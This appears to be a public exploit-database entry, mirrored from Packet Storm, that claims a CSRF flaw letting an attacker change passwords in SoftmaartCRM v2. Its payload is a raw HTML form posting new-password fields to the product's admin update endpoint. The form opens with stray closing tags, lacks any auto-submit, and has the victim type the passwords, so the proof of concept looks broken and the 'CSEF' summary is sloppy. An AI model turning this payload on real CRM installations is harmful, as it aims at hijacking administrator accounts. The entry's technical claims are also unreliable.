## https://sploitus.com/exploit?id=PACKETSTORM:225160
==================================================================================================================================
| # Title : SoftmaartCRM v2 CSRF vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://softmaart.com/best-website-design-company.php |
==================================================================================================================================
[+] Summary : SoftmaartCRM v2 suffer from CSEF Change password vulnerability.
[+] payload :
</b></span>
</div>
<div class="panel-body">
<div class="row">
<div class="col-lg-3"></div>
<div class="col-lg-6">
<form method="post" action="https://127.0.0.1/admin_panel/back_update_pass.php">
<div class="row">
<div class="col-lg-12">
<div class="form-group">
<label>Enter New password</label>
<input class="form-control" required="" maxlength="100" placeholder="Enter here" name="newpass" type="password">
</div>
</div>
<div class="col-lg-12">
<div class="form-group">
<label>Re-Enter password</label>
<input class="form-control" required="" maxlength="100" placeholder="Enter here" name="repass" type="password">
</div>
</div>
<div class="col-lg-12">
<div class="form-group">
<input type="submit" value="ADD" class="btn btn-success form-control">
</div>
</div>
<div class="col-lg-12">
<div class="form-group">
<span id="error_msg" style="color: red;"></span>
</div>
</div>
</div>
</form>
</div>
<div class="col-lg-3"> </div>
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================